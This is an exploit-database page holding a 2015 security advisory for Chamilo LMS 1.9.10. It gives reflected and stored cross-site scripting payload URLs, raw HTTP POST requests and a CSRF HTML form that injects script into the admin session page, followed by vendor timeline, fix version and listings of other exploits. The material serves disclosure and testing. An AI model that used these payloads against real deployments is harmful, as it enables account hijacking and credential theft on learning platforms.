Menu

Search for hundreds of thousands of exploits

"Chamilo LMS 1.9.10 - Multiple Vulnerabilities"

Author

Exploit author

"Rehan Ahmed"

Platform

Exploit platform

php

Release date

Exploit published date

2015-03-19

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
I. Overview 
======================================================== 
Chamilo LMS 1.9.10 or prior versions are prone to a multiple Cross-Site Scripting (Stored + Reflected) & CSRF vulnerabilities. These vulnerabilities allows an attacker to gain control over valid user accounts in LMS, perform operations on their behalf, redirect them to malicious sites, steal their credentials, and more. 

II. Severity 
======================================================== 
Rating: High 
Remote: Yes 
Authentication Require: Yes 
CVE-ID: 

III. Vendor's Description of Application 
======================================================== 
Chamilo LMS, or Chamilo Learning Management System is a piece of software that allows you to create a virtual campus for the provision of online or semi-online training. It is distributed under the GNU/GPLv3+ license and its development process is public. All the Chamilo software products are entirely free (as in freedom), free (as in beer) and complete, and are production-ready without requiring any type of payment. 

https://chamilo.org/chamilo-lms/ 

IV. Vulnerability Details & Exploit 
======================================================== 
1) Multiple Reflected XSS Request 

Request Method = GET 

XSS PoC's:- 

/main/calendar/agenda_list.php?type=personal%27%20onmouseover=%27confirm%280%29%27/%3E%3C!--
/main/messages/outbox.php?f=social"+onmouseover="confirm(0)
/main/mySpace/student.php?keyword=31337"+onmouseover=confirm(0)//&active=0&_qf__search_user=&submit=Search
/main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ajax_get_file_listing.php?editor=stand_alone&view=thumbnail&search=1&search_name=admin&search_recursively=0&search_mtime_from=&search_mtime_to=&search_folder=;</script><script>confirm(0)</script>
/main/admin/configure_extensions.php?display=</script><script>confirm(0)</script>
/main/admin/course_category.php?action=add&category="/><script>confirm(0)</script>
/main/admin/session_edit.php?page=resume_session.php%22%20onmouseover=confirm%280%29//&id=1

b) User Agent Header XSS (Reflected)
GET /main/admin/system_status.php?section=webserver
User-Agent: <script>confirm(0)</script>
__________________________________________________________ 

2) Stored XSS 

File Attachment Description parameter (legend[]) is vulnerable to Stored XSS By utilizing "social network" an attacker may send a crafted message to anybody with XSS payload in the file attachment description field (i.e legend[]) 

Request Method : POST 
Location = /main/messages/new_message.php?f=social 
Parameter = legend[] 

Stored XSS PoC :- 

POST /main/messages/new_message.php?f=social HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/main/messages/new_message.php?f=social
Cookie: XXXXXXXXXXXXXXXXXXXXXX
Connection: keep-alive
Content-Type: multipart/form-data;
boundary=---------------------------8461144986726
Content-Length: 1023
-----------------------------8461144986726
Content-Disposition: form-data; name="users[]"
3
-----------------------------8461144986726
Content-Disposition: form-data; name="title"
Stored XSS Test Via Social network
-----------------------------8461144986726
Content-Disposition: form-data; name="content"
This is test message<BR>
-----------------------------8461144986726
Content-Disposition: form-data; name="attach_1"; filename="test.txt"
Content-Type: text/plain
I owned you !!!!
-----------------------------8461144986726
Content-Disposition: form-data; name="legend[]"
Cool File <script>confirm(0)</script>
-----------------------------8461144986726
Content-Disposition: form-data; name="compose"

-----------------------------8461144986726
Content-Disposition: form-data; name="_qf__compose_message"

-----------------------------8461144986726
Content-Disposition: form-data; name="sec_token"
42917ca29da38f60d49bbaf2ba89b1b9
-----------------------------8461144986726--
________________________________________________________________________ 

3) CSRF & Stored XSS Request 

Method = POST 
Location = /main/admin/session_add.php 
Parameter = name 

POST /main/admin/session_add.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0)
Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml
+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1//main/admin/session_add.php
Cookie:XXXXXXXXXXXXXXXXXXXXXX
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 231

formSent=1&name=<script>confirm(0)</script>&coach_username=rehan&session_category=0&nb_days_acess_before=0&nb_days_acess_after=0&start_limit=on&day_start=2&month_start=3&year_start=2015&end_limit=on&day_end=2&month_end=3&year_end=2016&session_visibility=2

CSRF PoC:-

<html>
<!-- CSRF Request With Stored XSS Payload -->
<body>
<form action="http://127.0.0.1/main/admin/session_add.php"
method="POST">
<input type="hidden" name="formSent" value="1" />
<input type="hidden" name="name"
value="Test<script>confirm(0)</script>" />
<input type="hidden" name="coach_username" value="admin" />
<input type="hidden" name="session_category" value="0" />
<input type="hidden" name="nb_days_acess_before"
value="0" />
<input type="hidden" name="nb_days_acess_after"
value="0" />
<input type="hidden" name="start_limit" value="on" />
<input type="hidden" name="day_start" value="2" />
<input type="hidden" name="month_start" value="3" />
<input type="hidden" name="year_start" value="2015" />
<input type="hidden" name="end_limit" value="on" />
<input type="hidden" name="day_end" value="2" />
<input type="hidden" name="month_end" value="3" />
<input type="hidden" name="year_end" value="2016" />
<input type="hidden" name="session_visibility" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


VI. Affected Systems 
======================================================== 
Software: Chamilo LMS 
Version: 1.9.10 and Prior
Solution (Fix): Upgrade to 1.9.11 (https://github.com/chamilo/chamilo-lms/)

VII. Vendor Response/Solution 
======================================================== 
Vendor Contacted : 02/12/2015 
Vendor Response : 02/12/2015 
Patch Release: 03/17/2015 
Advisory Release: 03/18/2015

VIII.Credits 
======================================================== 
Discovered by Rehan Ahmed 
knight_rehan@hotmail.com
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2015-03-19 "Chamilo LMS 1.9.10 - Multiple Vulnerabilities" webapps php "Rehan Ahmed"
2015-02-19 "CrushFTP 7.2.0 - Multiple Vulnerabilities" webapps multiple "Rehan Ahmed"
2012-06-28 "TEMENOS T24 - Multiple Cross-Site Scripting Vulnerabilities" webapps jsp "Rehan Ahmed"
2010-01-13 "Nemesis Player (NSP) - Local Denial of Service" dos windows "Rehan Ahmed"
2010-01-13 "Ofilter Player - 'skin.ini' Local Crash (PoC)" dos windows "Rehan Ahmed"
2010-01-13 "NPlayer - '.dat Skin' Local Heap Overflow (PoC)" dos windows "Rehan Ahmed" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected